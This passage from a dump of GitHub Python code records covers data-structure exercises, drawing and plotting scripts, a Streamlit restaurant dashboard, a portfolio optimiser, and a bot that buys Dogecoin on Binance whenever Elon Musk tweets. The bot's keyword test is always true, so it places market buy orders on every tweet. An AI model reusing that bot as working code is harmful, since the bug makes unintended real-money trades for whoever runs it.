Please Enter a valid index\".format(\n index, position\n ))\n return None\n\n return temp.value\n\n\nif __name__ == '__main__':\n # print(ll1)\n # print(ll2)\n # print(ll3)\n\n ll1, ll2, ll3 = create_sample_linked_lists()\n\n position = 3\n print(\"For a given linked List \\\"{}\\\" element on position {} is {}\".format(\n ll1, position, getNthItem(ll1, position)\n ))\n\n position = 3\n print(\"For a given linked List \\\"{}\\\" element on position {} is {}\".format(\n ll2, position, getNthItem(ll2, position)\n ))\n\n position = 3\n print(\"For a given linked List \\\"{}\\\" element on position {} is {}\".format(\n ll3, position, getNthItem(ll3, position)\n ))\n\n position = 15\n print(\"For a given linked List \\\"{}\\\" element on position {} is {}\".format(\n ll3, position, getNthItem(ll3, position)\n ))\n","repo_name":"sakshamratra0106/PracticeProblems","sub_path":"DSAPracticeSheets/LinkedList/1GetNthnodeinalinkedlist.py","file_name":"1GetNthnodeinalinkedlist.py","file_ext":"py","file_size_in_byte":1447,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"73840999591","text":"def house(color, start_x, start_y, side_y_size, side_x_size, brick_x_size, brick_y_size, width):\r\n import simple_draw as sd\r\n from village import wall\r\n\r\n # вызываем стену\r\n\r\n wall.wall(color=color, start_x=start_x, start_y=start_y, side_y_size=side_y_size, side_x_size=side_x_size,\r\n brick_x_size=brick_x_size, brick_y_size=brick_y_size, width=width)\r\n\r\n house_length = wall.wall_length[0]\r\n end_y_wall = wall.wall_length[1]\r\n\r\n # рисуем крышу\r\n point_1 = sd.get_point(x=start_x, y=end_y_wall + brick_y_size)\r\n point_2 = sd.get_point(x=start_x + house_length * .3, y=side_y_size + + brick_y_size * 3)\r\n point_3 = sd.get_point(x=house_length, y=end_y_wall + brick_y_size)\r\n point_list = [point_1, point_2, point_3]\r\n sd.polygon(point_list=point_list, color=sd.COLOR_DARK_RED, width=0)\r\n\r\n # рисуем окно\r\n window_point = sd.get_point(x=side_x_size / 1.5, y=side_y_size / 2)\r\n sd.square(left_bottom=window_point, side=side_y_size / 3, color=sd.COLOR_WHITE, width=0)\r\n\r\n # рисуем землю\r\n point_1 = sd.get_point(x=0, y=0)\r\n point_2 = sd.get_point(x=0, y=100)\r\n point_3 = sd.get_point(x=sd.resolution[0], y=100)\r\n point_4 = sd.get_point(x=sd.resolution[0], y=0)\r\n point_list = [point_1, point_2, point_3, point_4]\r\n sd.polygon(point_list=point_list, color=sd.COLOR_DARK_ORANGE, width=0)\r\n","repo_name":"esurkova90/practicing","sub_path":"village/house.py","file_name":"house.py","file_ext":"py","file_size_in_byte":1407,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"3385167754","text":"# Program for Trie Insert and Search\n\n# Trie node\nclass TrieNode:\n\tdef __init__(self):\n\t\tself.children = [None]*26\n\t\tself.isEndOfWord = False\n\n# Trie Class\nclass Trie:\n\tdef __init__(self):\n\t\tself.root = self.getNode()\n\n\tdef getNode(self):\n\t\treturn TrieNode()\n\n\tdef toIndex(self, ch):\n\t\treturn ord(ch)-ord('a')\n\n\t# Function to Insert into Trie\n\tdef insert(self, key):\n\t\tnode = self.root\n\t\tlength = len(key)\n\n\t\tfor i in range(length):\n\t\t\tidx = self.toIndex(key[i])\n\t\t\tif not node.children[idx]:\n\t\t\t\tnode.children[idx] = self.getNode()\n\t\t\tnode = node.children[idx]\n\t\tnode.isEndOfWord = True\n\n\t# Function for Trie Search\n\tdef search(self, key):\n\t\tnode = self.root\n\t\tlength = len(key)\n\n\t\tfor i in 
range(length):\n\t\t\tidx = self.toIndex(key[i])\n\t\t\tif not node.children[idx]:\n\t\t\t\treturn False\n\t\t\tnode = node.children[idx]\n\t\treturn node!=None and node.isEndOfWord\n\n\n# Main function \n# To test code, please edit keys list and print statements for search\ndef main():\n\tkeys = [\"the\",\"apple\",\"there\",\"hello\",\"world\", \"by\",\"python\"]\n\toutput = [\"Not present in trie\", \"Present in trie\"]\n\n\t# Construct Trie\n\ttrie = Trie()\n\n\tfor key in keys:\n\t\ttrie.insert(key)\n\n\n\t# Search in trie\n\tprint(\"{} => {}\".format(\"the\", output[trie.search(\"the\")]))\n\tprint(\"{} => {}\".format(\"hi\", output[trie.search(\"hi\")]))\n\tprint(\"{} => {}\".format(\"apple\", output[trie.search(\"apple\")]))\n\tprint(\"{} => {}\".format(\"man\", output[trie.search(\"man\")]))\n\nif __name__ == '__main__':\n\tmain()\n\n## Sample Output ##\n# the => Present in trie\n# hi => Not present in trie\n# apple => Present in trie\n# man => Not present in trie","repo_name":"ahampriyanshu/algo-ds-101","sub_path":"Algorithms/Searching/Trie-Search/Trie_Search.py","file_name":"Trie_Search.py","file_ext":"py","file_size_in_byte":1574,"program_lang":"python","lang":"en","doc_type":"code","stars":155,"dataset":"github-code","pt":"72"} +{"seq_id":"22157082582","text":"import folium as fo\nfrom streamlit_folium import folium_static\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom PIL import Image\nimport plotly.express as px\nimport streamlit as st\n\ncountries = {\n1: \"India\",\n14: \"Australia\",\n30: \"Brazil\",\n37: \"Canada\",\n94: \"Indonesia\",\n148: \"New Zeland\",\n162: \"Philippines\",\n166: \"Qatar\",\n184: \"Singapure\",\n189: \"South Africa\",\n191: \"Sri Lanka\",\n208: \"Turkey\",\n214: \"United Arab Emirates\",\n215: \"England\",\n216: \"United States of America\",\n}\n\ndef country_name(country_id):\n return countries[country_id]\n\ndef get_price_range_description(price_range):\n if price_range == 1:\n return \"cheap\"\n elif price_range == 2:\n return \"normal\"\n elif price_range == 3:\n return \"expensive\"\n else:\n return \"gourmet\"\n\ndef convert_to_dollar(currency, price):\n if currency == 'Botswana Pula(P)':\n return price*0.076\n elif currency == 'Brazilian Real(R$)':\n return price*0.19\n elif currency == 'Dollar($)':\n return price*1\n elif currency == 'Emirati Diram(AED)':\n return price*0.27\n elif currency == 'Indian Rupees(Rs.)':\n return price*0.012\n elif currency == 'Indonesian Rupiah(IDR)':\n return price*0.000066\n elif currency == 'NewZealand($)':\n return price*0.623515\n elif currency == 'Pounds(£)':\n return price*1.24\n elif currency == 'Qatari Rial(QR)':\n return price*0.27\n elif currency == 'Rand(R)':\n return price*0.056\n elif currency == 'Sri Lankan Rupee(LKR)':\n return price*0.0031\n elif currency == 'Turkish Lira(TL)':\n return price*0.0052\n else:\n return price\n\ndef clear_data(df):\n # Limpeza\n # Remove itens duplicados\n df1 = df.drop_duplicates()\n\n # Reseta index para não criar o problema de itens \"pulados\" pelo filtro.\n # O inplace=True serve para executar as alterações no próprio dataframe (e não como retorno), e\n # o drop=True serve para ele não gerar uma nova coluna de index.\n df1.reset_index(inplace=True, drop=True)\n\n # Disable chained assignments, evita o warning de cópia sobre uma parte do dataframe.\n pd.options.mode.chained_assignment = None\n\n # A coluna do dataframe possui várias informações separadas por vírgulas. 
Essa função remove as\n # demais e atribui apenas o primeiro valor.\n # Possível utilização também da função assign:\n # df = df.assign(my_col=lambda d: d['my_col'].astype(int))\n df1['Cuisines'] = df1.loc[:, 'Cuisines'].apply(lambda x: str(x).split(',')[0])\n\n # Cria a coluna com o nome do país baseado na função definida acima.\n df1['Country Name'] = df1.loc[:, 'Country Code'].apply(lambda x: country_name(x))\n\n # Cria a coluna com a descrição da faixa de preço baseado na função definida acima.\n df1['Price Range Description'] = df1.loc[:, 'Price range'].apply(lambda x: get_price_range_description(x))\n\n # Acertando um valor errado em um restaurante na Austrália.\n df1.loc[(df1['Country Name']=='Australia') & (df1['Average Cost for two']==25000017.0), 'Average Cost for two']=250\n\n # Cria a coluna com o preço em dólar baseado na função definida acima.\n df1['Price in Dollar for two'] = df1.loc[:, ['Currency', 'Average Cost for two']].apply(lambda x: convert_to_dollar(x['Currency'], x['Average Cost for two']), axis=1)\n \n return df1\n\nst.set_page_config(page_title='City View',\n layout='wide',\n initial_sidebar_state='expanded',\n page_icon=':cityscape:')\n\n# Lendo o arquivo e limpando o data frame\ndf = pd.read_csv('zomato.csv')\ndf1 = clear_data(df)\n\n# Streamlit\n# Barra lateral\n#st.sidebar.image(Image.open('pineapple.jpg'), width=60)\n#st.sidebar.markdown('# Curry Company')\n#st.sidebar.markdown('## Fastest Delivery in Town')\n#st.sidebar.markdown(\"\"\"---\"\"\")\n\nst.sidebar.markdown('## Filter')\ncountryList = st.sidebar.multiselect('Which countries do you want to view?',\n ['Australia', 'Brazil', 'Canada', 'England', 'India', 'Indonesia', 'New Zeland',\n 'Philippines', 'Qatar', 'Singapure', 'South Africa', 'Sri Lanka', 'Turkey',\n 'United Arab Emirates', 'United States of America'],\n default=['Brazil', 'England', 'India', 'Turkey', 'United States of America'])\ndf1 = df1.loc[df1['Country Name'].isin(countryList), :]\n\nst.sidebar.markdown(\"\"\"---\"\"\")\nst.sidebar.markdown('#### Powered by FNunes')\n\n# Layout principal\nst.header(':cityscape: City View')\n# https://streamlit-emoji-shortcodes-streamlit-app-gwckff.streamlit.app/\nwith st.container():\n # Top 10 cidades com mais restaurantes na base de dados.\n dfCity = df1.loc[:, ['Country Name', 'City', 'Restaurant ID']].groupby(['Country Name', 'City']).count()\n dfCity = dfCity.sort_values('Restaurant ID', ascending=False).reset_index()\n dfCity.rename(columns = {'Country Name': 'Country', 'Restaurant ID': 'Qty of Restaurants'}, inplace=True)\n st.plotly_chart(px.bar(dfCity.head(10), x='City', y='Qty of Restaurants', color='Country', title='Qty of Restaurants by Country'), use_container_width=True)\n\nwith st.container():\n col1, col2 = st.columns(2)\n with col1:\n # Gráfico de barras com a quantidade de restaurantes com avaliação acima de 4 por cidade,\n # com cores diferentes para cada país.\n dfCity = df1.loc[df1['Aggregate rating']>=4, ['Country Name', 'City', 'Restaurant ID']].groupby(['Country Name', 'City']).count()\n dfCity = dfCity.sort_values('Restaurant ID', ascending=False).reset_index()\n dfCity.rename(columns = {'Country Name': 'Country', 'Restaurant ID': 'Qty of Restaurants'}, inplace=True)\n st.plotly_chart(px.bar(dfCity.head(10), x='City', y='Qty of Restaurants', color='Country', title='Qty of Restaurants over 4.0'), use_container_width=True)\n\n with col2:\n # Gráfico de barras com a quantidade de restaurantes com avaliação abaixo de 2.5 por cidade,\n # com cores diferentes para cada país.\n 
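        # The groupby -> count -> sort -> rename pipeline below is repeated for most
        # charts on this page; a hedged refactoring sketch (top_cities is a
        # hypothetical helper name, not part of the original app):
        #
        # def top_cities(frame, ascending=False):
        #     out = frame.loc[:, ['Country Name', 'City', 'Restaurant ID']]
        #     out = out.groupby(['Country Name', 'City']).count()
        #     out = out.sort_values('Restaurant ID', ascending=ascending).reset_index()
        #     return out.rename(columns={'Country Name': 'Country',
        #                                'Restaurant ID': 'Qty of Restaurants'})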
dfCity = df1.loc[df1['Aggregate rating']<2.5, ['Country Name', 'City', 'Restaurant ID']].groupby(['Country Name', 'City']).count()\n dfCity = dfCity.sort_values('Restaurant ID', ascending=True).reset_index()\n dfCity.rename(columns = {'Country Name': 'Country', 'Restaurant ID': 'Qty of Restaurants'}, inplace=True)\n st.plotly_chart(px.bar(dfCity.head(10), x='City', y='Qty of Restaurants', color='Country', title='Qty of Restaurants under 2.5'), use_container_width=True)\n \nwith st.container():\n # Gráfico de barras com as top 10 cidades com mais tipos de culinária diferentes, com\n # cores diferentes para cada país.\n dfCity = df1.loc[:, ['Country Name', 'City', 'Cuisines']].drop_duplicates().groupby(['Country Name', 'City']).count()\n dfCity = dfCity.sort_values('Cuisines', ascending=False).reset_index()\n dfCity.rename(columns = {'Country Name': 'Country', 'Cuisines': 'Qty of Cuisines'}, inplace=True)\n st.plotly_chart(px.bar(dfCity.head(10), x='City', y='Qty of Cuisines', color='Country', title='Qty of Cuisines'), use_container_width=True)","repo_name":"fbarros1b/restaurants","sub_path":"pages/view2cities.py","file_name":"view2cities.py","file_ext":"py","file_size_in_byte":7080,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"27090655657","text":"import tweepy\r\nimport time \r\nimport pprint\r\nimport secrets\r\nimport sys\r\nimport config\r\nimport math\r\nfrom binance.client import Client\r\n\r\n\r\n#Note: how global vars work\r\n#TODO improvements !! use limit sells!! they are safer! as market sells dont work if the price is dumping HARD or mooning HARD! \r\n#in those extreme cases you are forced to limit buy/sell \r\n\r\nMyTwitterId = '499189739' #my own personal twitter id \r\nElonMustTwitterId = '44196397' #ElonMusk twitter id \r\nexpendableUSDT = 300 #USDT willing to allow the bot to spend to dogecoin\r\nbaughtDoges = 0. #ammount of doges baught\r\n\r\n#TODO once i have a fix ip get allow access with the key ONLY FROM THAT IP ADDRESS ( for extra security)\r\n\r\n#Connect to twitter API \r\nauth = tweepy.OAuthHandler(config.twAPIKey, config.twAPISKEY)\r\nauth.set_access_token(config.twAPIToken, config.twAPISToken)\r\napi = tweepy.API(auth)\r\n\r\n#Connect to Binance API \r\nclient = Client(config.BkEY, config.bSKey)\r\nprint(\"connected to API's\")\r\n\r\n#Filters out mentions and RTs, only keeps tweets made by the creator\r\ndef from_creator(status): \r\n if hasattr(status, 'retweeted_status'):\r\n return False\r\n elif status.in_reply_to_status_id != None:\r\n return False\r\n elif status.in_reply_to_screen_name != None:\r\n return False\r\n elif status.in_reply_to_user_id != None:\r\n return False\r\n else:\r\n return True\r\n\r\n#Gets current price of DOGE IN USDT \r\ndef getCurPrice(): \r\n prices = client.get_all_tickers()\r\n for i in range(len(prices)):\r\n if(prices[i]['symbol'] == 'DOGEUSDT') : \r\n return float(prices[i]['price'])\r\n return 0\r\n\r\n#return how many doges i can buy with my usdt (we use a 0.1 safety margin) and truncate to and int for simplicity\r\ndef usdtToDoges(usdt) :\r\n return int(usdt/(getCurPrice() + 0.1))\r\n\r\n#Beggins tracking price of DOGE and sells if price drops by more then 35% of highest price \r\ndef launchPriceTracker(curHighestPrice, startPrice): \r\n time.sleep(120.) 
#check every 2 minutes\r\n \r\n highestPrice = curHighestPrice\r\n curPrice = getCurPrice()\r\n if(curPrice == 0): exit() #error\r\n if(highestPrice < curPrice):\r\n highestPrice = curPrice #update highest price since buy order\r\n \r\n priceDiffToCur = (curPrice - startPrice) \r\n priceDiffToHighest = (highestPrice - startPrice) \r\n\r\n #if current price or highest price if lower then starting price (this means price went down instead of up) then sell\r\n if(priceDiffToCur < -0.2 or priceDiffToHighest < -0.2 ): \r\n order = client.order_market_sell(symbol='DOGEUSDT', quantity = baughtDoges)\r\n sys.stdout.flush()\r\n print(order)\r\n exit()\r\n\r\n \r\n if(priceDiffToHighest != 0 and math.fabs((priceDiffToCur)/(priceDiffToHighest)) < 6.5/10.) : #if fall by 35% below local highest then sell \r\n print(\"tries to sell doges the div is: \" + str(priceDiffToCur) +\" \"+ str(priceDiffToHighest) + \" \"+ str((priceDiffToCur)/(priceDiffToHighest)))\r\n order = client.order_market_sell(symbol='DOGEUSDT', quantity = baughtDoges) #todo thing about cashing out same amount of doges i baught\r\n print(order)\r\n exit()\r\n\r\n launchPriceTracker(highestPrice, startPrice)\r\n\r\nclass MyStreamListener(tweepy.StreamListener):\r\n\r\n def on_status(self, status):\r\n if from_creator(status): \r\n tweet = status.text.lower()\r\n if \"doge\" or \"hodl\" or \"coin\" or \"dog\" or \"hold\" or \"bark\" or \"shiba\" \\\r\n or \"inu\" in tweet:\r\n quantityOfDogesToBuy = usdtToDoges(expendableUSDT)\r\n order = client.order_market_buy(symbol='DOGEUSDT', quantity = quantityOfDogesToBuy) #TODO smarter way of defining nDogeCoins upper bounded by my quantitiy dogecoins \r\n print(order) \r\n global baughtDoges \r\n baughtDoges = quantityOfDogesToBuy #record the number of doges baught\r\n print(\"order status: \" + order['status'])\r\n sys.stdout.flush()\r\n startPrice = getCurPrice()\r\n if(order['status'] == 'FILLED'):\r\n launchPriceTracker(startPrice, startPrice)\r\n else:\r\n exit() #error\r\n return True\r\n return True\r\n\r\n\r\n def on_error(self, status_code):\r\n if status_code == 420:\r\n print(\"Error 420\")\r\n #returning False in on_error disconnects the stream\r\n return False\r\n \r\n#create stream and keep twitter accounts i choose to follow\r\nmyStreamListener = MyStreamListener()\r\nmyStream = tweepy.Stream(auth = api.auth, listener=myStreamListener) \r\nmyStream.filter(follow=[MyTwitterId, ElonMustTwitterId])\r\n#add tesla account, spacex and also companies, mavericks, mark cuban, companies who might it, also add coinbase!!! ect.. (try to asses if the tweets are good can also be an improvement)\r\n\r\nprint(\"listening...\")\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n#possible optimisations : check more the one user, get more words, organise code better maybe even use 1 folder for classes, HIDE CREDS ect.. 
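#Note on launchPriceTracker(): it re-enters itself every two minutes, so CPython's
#default recursion limit (~1000 frames) would abort tracking after roughly 33 hours.
#A hedged iterative sketch of the same trailing-stop logic (track_price is a
#hypothetical replacement name, not part of the original bot):
#
# def track_price(start_price):
#     highest_price = start_price
#     while True:
#         time.sleep(120.)  #check every 2 minutes
#         cur_price = getCurPrice()
#         if cur_price == 0:
#             return  #price feed error, same as the recursive version's exit()
#         highest_price = max(highest_price, cur_price)
#         diff_to_cur = cur_price - start_price
#         diff_to_highest = highest_price - start_price
#         #sell on an absolute loss, or once 35% of the peak gain has been given back
#         if diff_to_cur < -0.2 or (diff_to_highest != 0 and abs(diff_to_cur / diff_to_highest) < 0.65):
#             print(client.order_market_sell(symbol='DOGEUSDT', quantity=baughtDoges))
#             return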
\r\n\r\n#Debugging prints\r\n#print(\"startPrice: \" + str(startPrice))\r\n#print(\"curPrice :\" + str(curPrice))\r\n#print(\"highestPrice: \" + str(highestPrice))\r\n\r\n#=============EXAMPLES OF HOW TO WORK WITH BINANCE API =======================================================================================================\r\n#info = client.get_symbol_info('BNBBTC')\r\n#for i in info:\r\n# print(i)\r\n\r\n#info = client.get_account()\r\n#print(info)\r\n#bal = info['balances']\r\n#for b in bal: \r\n# if float(b['free']) > 0:\r\n# print(b)\r\n\r\n#gets last trades with this pair (BNBBTC) buy = BUY BNB (SELL BTC) (i think)\r\n#trades = client.get_my_trades(symbol = 'BNBBTC')\r\n\r\n#GIVEN THE DIFFERENT STRUCTURE OF THE JSON here its a list of jsons, we need to access the jsons with indices and then can use the field (for balance it was a json with other jsons inside)\r\n#prices = client.get_all_tickers()\r\n#print(prices)\r\n#for i in range(len(prices)):\r\n# if(prices[i]['symbol'] == 'DOGEUSDT') : \r\n# print(prices[i]['price'])\r\n\r\n#The tutorial i used, hes got alot of other vids on blockahin or how\r\n#to create my own crypto \r\n# https://www.youtube.com/watch?v=3uxAn7EBSS0&t=196s\r\n#to make an order its easy just check documentation on binance https://python-binance.readthedocs.io/en/latest/binance.html","repo_name":"Gianniii/TwitterBinanceDogecoinBot","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6422,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"22959020188","text":"class Solution:\n def validMountainArray(self, arr: List[int]) -> bool:\n N = len(arr)\n i = 0\n \n ## first check edge cases, which means that the peak cannot be the first and the last element\n if N == 0:\n return False\n\n \n ## walk up\n while i + 1 < N and arr[i] < arr[i + 1]:\n i += 1\n \n ## check if the peak is the first or the last \n if i == 0 or i == N - 1:\n return False\n \n ## walk down\n while i + 1 < N and arr[i] > arr[i + 1]:\n i += 1\n \n return i == N - 1\n \n","repo_name":"jenli810006995/365DaysofAlgorithms","sub_path":"Array/941. 
Valid Mountain Array/Valid_Mountain_Array.py","file_name":"Valid_Mountain_Array.py","file_ext":"py","file_size_in_byte":652,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"25976183280","text":"from numpy.core.fromnumeric import ptp\nimport pandas as pd\nimport numpy as np\nimport pandas_datareader.data as web\nimport datetime\nfrom scipy.optimize import minimize\n\n\nif __name__ == '__main__':\n start = datetime.datetime(2021, 5, 10)\n end = datetime.datetime(2021, 6, 10)\n tickets = ['CEVA', 'GOOGL', 'TSLA', 'ZOM']\n tickets = ['FB', 'GOOGL', 'AAPL', 'AMZN',]\n # 'TSLA', 'DIS', 'NVS', 'NVDA', 'TSM', 'KO', 'TXN', 'AMD']\n\n print(\"get data\")\n columns = []\n\n for ticket in tickets:\n data = web.DataReader(ticket, 'yahoo', start, end)\n columns.append(data['Close'])\n\n stocks = pd.concat(columns, axis=1)\n stocks.columns = tickets \n\n print('end get data')\n\n returns = stocks / stocks.shift(1)\n logReturns = np.log(returns)\n\n noOfPortfolios = 100000\n meanLogReturns = logReturns.mean()\n Sigma = logReturns.cov()\n\n weights = np.zeros((noOfPortfolios, len(tickets)))\n expectedReturn = np.zeros(noOfPortfolios)\n expectedVolatility = np.zeros(noOfPortfolios)\n sharpeRatio = np.zeros(noOfPortfolios)\n\n print(\"Sigma\")\n print(Sigma)\n print()\n\n print(\"log returns\")\n print(logReturns)\n print()\n\n print(\"mean log returns\")\n print(meanLogReturns)\n print()\n\n\n for k in range(noOfPortfolios):\n # generate random weights\n w = np.array(np.random.random(len(tickets)))\n w = w / w.sum()\n weights[k, :] = w\n\n # expected log return\n expectedReturn[k] = np.sum(meanLogReturns * w)\n\n # expected volatility\n expectedVolatility[k] = np.sqrt(np.dot(w.T, np.dot(Sigma, w)))\n\n # sharpe ratio\n sharpeRatio[k] = expectedReturn[k] / expectedVolatility[k]\n\n maxIndex = sharpeRatio.argmax()\n\n\n print(f'Return {expectedReturn[maxIndex]}')\n print(f'Volatility {expectedVolatility[maxIndex]}')\n print(f'SharpeRatio {sharpeRatio[maxIndex]}')\n\n\n\n print(f'Weights {weights[maxIndex]}')\n\n print()\n\n for k,v in zip(tickets, weights[maxIndex]):\n print(f'{k:>10} {100*v:6.2f}')\n\n\n def negativeSR(w):\n w = np.array(w)\n R = np.sum(meanLogReturns * w)\n V = np.sqrt(np.dot(w.T, np.dot(Sigma, w)))\n return -(R-0.001)/V\n\n def checkSumToOne(w):\n return np.sum(w) - 1\n\n w0 = np.asarray([.25]*len(tickets))\n bounds = ((0, 1),)*len(tickets)\n constraints = ({'type': 'eq', 'fun': checkSumToOne})\n w_opt = minimize(negativeSR, w0, method='SLSQP', \n bounds=bounds, constraints=constraints,\n options={'disp':True, 'ftol': .0000001})\n\n print()\n for k,v in zip(tickets, w_opt.x):\n print(f'{k:>10} {100*v:6.2f}')\n\n\n print(negativeSR(w0))\n\n","repo_name":"lmpizarro/go-finance","sub_path":"markowitz/opt_max.py","file_name":"opt_max.py","file_ext":"py","file_size_in_byte":2698,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"24980366800","text":"#!/usr/bin/env python\nimport getopt\nimport sys\nimport re\nimport math\nimport os\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport copy\nimport math\n\n\nbPress = False\n\ndef on_key_press(event):\n\tif event.key ==str(\"n\"):\n\t\tglobal bPress\n\t\tbPress = True\n\ndef getPress():\n\tglobal bPress\n\treturn bPress\n\ndef setPressFalse():\n\tglobal bPress\n\tbPress = False\n\ndef DrawSpline(splnex,splney):\n\trXList = []\n\trYList = []\n\tfor i in range(len(splnex) - 3):\n\t\tfor u in np.arange(0, 1, 
0.01):\n\t\t\tN03=(-u**3 + 3*u**2 - 3*u + 1) / 6;\n\t\t\tN13=(3*u**3 - 6*u**2 + 4) / 6;\n\t\t\tN23=(-3*u**3 + 3*u**2 + 3*u + 1)/6;\n\t\t\tN33=u**3/6;\n\t\t\trx=N03 * splnex[i] + N13 * splnex[i+1] + N23 * splnex[i+2] + N33 * splnex[i+3] \n\t\t\try=N03 * splney[i] + N13 * splney[i+1] + N23 * splney[i+2] + N33 * splney[i+3] \n\t\t\trXList.append(rx)\n\t\t\trYList.append(ry)\n\treturn rXList, rYList\n\nclass TracPos:\n\tdef __init__(self):\n\t\tself.GobalX = 0\n\t\tself.GobalY = 0\n\t\tself.GobalHeading = 0\n\t\tself.Curvature = 0\n\t\tself.Distane = 0\n\t\tself.Speedx = 0\n\t\tself.Speedy = 0\n\t\tself.Accx = 0\n\t\tself.Accy = 0\n\n\tdef setData( self,x,y,heading, curvature,dDistance, speedx,speedy,accx,accy):\n\t\tself.GobalX = x\n\t\tself.GobalY = y\n\t\tself.GobalHeading = heading\n\t\tself.Curvature = curvature\n\t\tself.Distane = dDistance\n\t\tself.Speedx = speedx\n\t\tself.Speedy = speedy\n\t\tself.Accx = accx\n\t\tself.Accy = accy\n\n\tdef getX(self):\n\t\treturn self.GobalX\n\n\tdef getY(self):\n\t\treturn self.GobalY\n\n\tdef wirteMatlabData(self,file):\n\t\tfile.write(str(self.GobalX))\n\t\tfile.write(\" \")\n\t\tfile.write(str(self.GobalY))\n\t\tfile.write(\" \")\n\t\tfile.write(str(self.GobalHeading))\n\t\tfile.write(\" \")\n\t\tfile.write(str(self.Curvature))\n\t\tfile.write(\" \")\n\t\tfile.write(str(self.Distane))\n\t\tfile.write(\" \")\n\t\tfile.write(str(self.Speedx))\n\t\tfile.write(\" \")\n\t\tfile.write(str(self.Speedy))\n\t\tfile.write(\" \")\n\t\tfile.write(str(self.Accx))\n\t\tfile.write(\" \")\n\t\tfile.write(str(self.Accy))\n\t\tfile.write(\"\\r\\n\")\n\n\tdef getPrintData(self):\n\t\t# return \"x:\"+str(self.GobalX)+\" y:\"+str(self.GobalY)+\" H:\"+str(self.GobalHeading)+\" C:\"+str(self.Curvature)+\"\\nSx:\"+str(self.Speedx)+\" Sy:\"+str(self.Speedy)+\" Ax:\"+str(self.Accx)+\" Ay:\"+str(self.Accy)\n\t\treturn \"H:\"+str(self.GobalHeading)+\" C:\"+str(self.Curvature)+\" Sx:\"+str(self.Speedx)+\" Sy:\"+str(self.Speedy)\t\t\t\t\t\n\nclass SplinePos:\n\tdef __init__(self):\n\t\tself.x = 0\n\t\tself.y = 0\n\n\tdef set( self,x,y):\n\t\tself.x = x\n\t\tself.y = y\n\n\tdef getX(self):\n\t\treturn self.x\n\n\tdef getY(self):\n\t\treturn self.y\n\n\tdef printPos(self):\n\t\tprint(\"x:\"+str(self.x)+\"y:\"+str(self.y))\n\nclass VPPos:\n\tdef __init__(self):\n\t\tself.x = 0\n\t\tself.y = 0\n\t\tself.heading = 0\n\n\tdef set( self,x,y):\n\t\tself.x = x\n\t\tself.y = y\n\n\tdef setAll( self,x,y,heading):\n\t\tself.x = x\n\t\tself.y = y\n\t\tself.heading = heading\t\n\n\tdef getX(self):\n\t\treturn self.x\n\n\tdef getY(self):\n\t\treturn self.y\n\n\tdef getHeading(self):\n\t\treturn self.heading\t\n\n\tdef printPos(self):\n\t\treturn \"x:\"+str(self.x)+\" y:\"+str(self.y)+\" heading:\"+str(self.heading)\n\nclass FrenetPos:\n\tdef __init__(self):\n\t\tself.dDistance = 0\n\t\tself.dSpeed = 0\n\t\tself.dAcceleration = 0\n\t\tself.sDistance = 0\n\t\tself.sSpeed = 0\n\t\tself.sAcceleration = 0\n\t\tself.sStopDistance = 0\n\t\tself.Width = 0\n\t\tself.TargetSpeed = 0\n\n\tdef set( self,dd,ds,da,sd,ss,sa,stops,widthd,tspeed):\n\t\tself.dDistance = dd\n\t\tself.dSpeed = ds\n\t\tself.dAcceleration = da\n\t\tself.sDistance = sd\n\t\tself.sSpeed = ss\n\t\tself.sAcceleration = sa\n\t\tself.sStopDistance = stops\n\t\tself.Width = widthd\n\t\tself.TargetSpeed = tspeed\n\t\n\tdef getPrint(self):\n\t\treturn \"Dd:\"+str(self.dDistance)+\" Ds:\"+str(self.dSpeed)+\" Da:\"+str(self.dAcceleration)+\" Sd:\"+str(self.sDistance)+\" Ss:\"+str(self.sSpeed)+\" Sa:\"+str(self.sAcceleration)+\" 
SStop:\"+str(self.sStopDistance)+\" DW:\"+str(self.Width)+\" Ts:\"+str(self.TargetSpeed)\n\nclass Frame:\n\tdef __init__(self):\n\t\tself.VPPos = VPPos()\n\t\tself.MatchPos = VPPos()\n\t\tself.GobalPos = VPPos()\n\t\tself.TList = []\n\t\tself.CandidateList = []\n\t\tself.FrenetList = []\n\t\tself.FrenetPos = FrenetPos()\n\n\tdef setVP( self, vp):\n\t\tself.VPPos = vp\n\n\tdef getVP(self):\n\t\treturn self.VPPos\n\n\tdef setGobalPos( self, vp):\n\t\tself.GobalPos = vp\n\n\tdef getGobalPos(self):\n\t\treturn self.GobalPos\t\n\n\tdef setMatchPos( self, vp):\n\t\tself.MatchPos = vp\n\n\tdef getMatchPos(self):\n\t\treturn self.MatchPos\n\n\tdef setFrenetPos( self, fp):\n\t\tself.FrenetPos = fp\n\n\tdef getFrenetPos(self):\n\t\treturn self.FrenetPos\t\n\n\tdef getTracPos(self):\n\t\treturn self.TList\n\n\tdef appendTracPos(self, tpos):\n\t\tself.TList.append(tpos)\n\n\tdef appendCandidatePos(self, tpos):\n\t\tself.CandidateList.append(tpos)\t\n\n\tdef getTXList(self):\n\t\txlist = []\n\t\tfor tp in self.TList:\n\t\t\txlist.append(tp.getX())\n\t\treturn xlist\n\n\tdef getTYList(self):\n\t\tylist = []\n\t\tfor tp in self.TList:\n\t\t\tylist.append(tp.getY())\n\t\treturn ylist\n\n\tdef getTYListPrint(self):\n\t\tstrdata = \"\"\n\t\tfor i in range(len(self.TList)):\n\t\t\tstrdata = strdata + self.TList[i].getPrintData()+\"\\n\"\n\t\treturn strdata\t\n\n\tdef getCXList(self):\n\t\txlist = []\n\t\tfor tp in self.CandidateList:\n\t\t\txlist.append(tp.getX())\n\t\treturn xlist\n\n\tdef getCYList(self):\n\t\tylist = []\n\t\tfor tp in self.CandidateList:\n\t\t\tylist.append(tp.getY())\n\t\treturn ylist\n\n\tdef printFrame(self):\n\t\tself.VPPos.printPos()\n\nshow_animation = True\nshow_trac = True\npltId = 1\nregexTracPos = 